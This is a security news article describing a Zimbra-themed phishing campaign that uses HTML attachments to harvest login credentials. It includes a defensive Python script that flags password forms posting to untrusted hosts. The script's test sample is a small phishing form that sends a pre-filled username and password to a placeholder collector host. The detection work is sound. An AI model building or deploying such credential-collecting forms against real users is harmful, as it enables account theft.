
New Mass-Spreading Social Engineering Campaign Targets Zimbra Collaboration Email Server Users

A mass-spreading social engineering campaign has been discovered, targeting users of the Zimbra Collaboration email server. The campaign aims to collect login credentials and has been active since April 2023. It primarily targets small and medium businesses and government entities in Poland, Ecuador, Mexico, Italy, and Russia. The threat actor or group behind the campaign has not been identified.

The attack begins with a phishing email containing an attached HTML file. The email warns the recipient about an email server update or account deactivation, and instructs them to open the attached file. The email is designed to appear as if it is coming from a Zimbra administrator, increasing the chances of the recipient opening the attachment.

The HTML file contains a Zimbra login page that is customized to match the targeted organization. The victim’s email address is pre-filled in the Username field to make the page seem more authentic. When the victim enters their credentials, the information is collected through an HTML form and sent to an actor-controlled server via an HTTPS POST request.

What sets this campaign apart is its ability to propagate further. Subsequent waves of phishing attacks have leveraged accounts from previously targeted companies. It is believed that the infiltrated administrator accounts were used to send emails to other entities of interest. This suggests that the attacker relies on password reuse by targeted administrators.

Although the campaign is not highly sophisticated, it takes advantage of the fact that HTML attachments contain legitimate code. The only suspicious element is a link embedded in the source code, which leads to the malicious host. This makes it easier for the emails to bypass reputation-based anti-spam policies compared to traditional phishing techniques.
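Because the form's destination is the one element that stands out, a mail gateway or triage script can inspect HTML attachments for exactly that. The following is an added example, not code from the original report: it flags any form that contains a password field and posts to a host outside an allowlist, and also reports a pre-filled email address. The function names, the allowlist, and the sample hosts and address are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormAuditor(HTMLParser):
    """Collects each <form>'s action URL and the inputs nested inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form> seen
        self._current = None   # the form currently open, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "password": False, "prefilled": None}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            kind = (a.get("type") or "text").lower()
            if kind == "password":
                self._current["password"] = True
            elif kind in ("text", "email") and "@" in (a.get("value") or ""):
                self._current["prefilled"] = a["value"]

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_html_attachment(html, trusted_hosts):
    """Return findings for password forms posting to hosts not in trusted_hosts."""
    parser = FormAuditor()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        # Relative actions have no host and are skipped.
        if form["password"] and host and host not in trusted_hosts:
            findings.append({"post_host": host,
                             "prefilled_user": form["prefilled"]})
    return findings


# Constructed sample attachment; the hosts and address are placeholders.
SAMPLE = """<html><body>
<form method="post" action="https://collector.example.net/login">
<input type="text" name="username" value="j.doe@corp.example">
<input type="password" name="password"><input type="submit" value="Sign In">
</form></body></html>"""
```

Calling `audit_html_attachment(SAMPLE, {"mail.corp.example"})` returns one finding naming the external host and the pre-filled address. Forms submitted by script rather than by an `action` attribute are outside what this check covers.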

Organizations using the Zimbra Collaboration email server should be vigilant and educate their employees about the risks of phishing attacks. Implementing multi-factor authentication and regularly applying security patches can help mitigate the risks associated with such campaigns.

The post New Mass-Spreading Social Engineering Campaign Targets Zimbra Collaboration Email Server Users appeared first on satProviders.
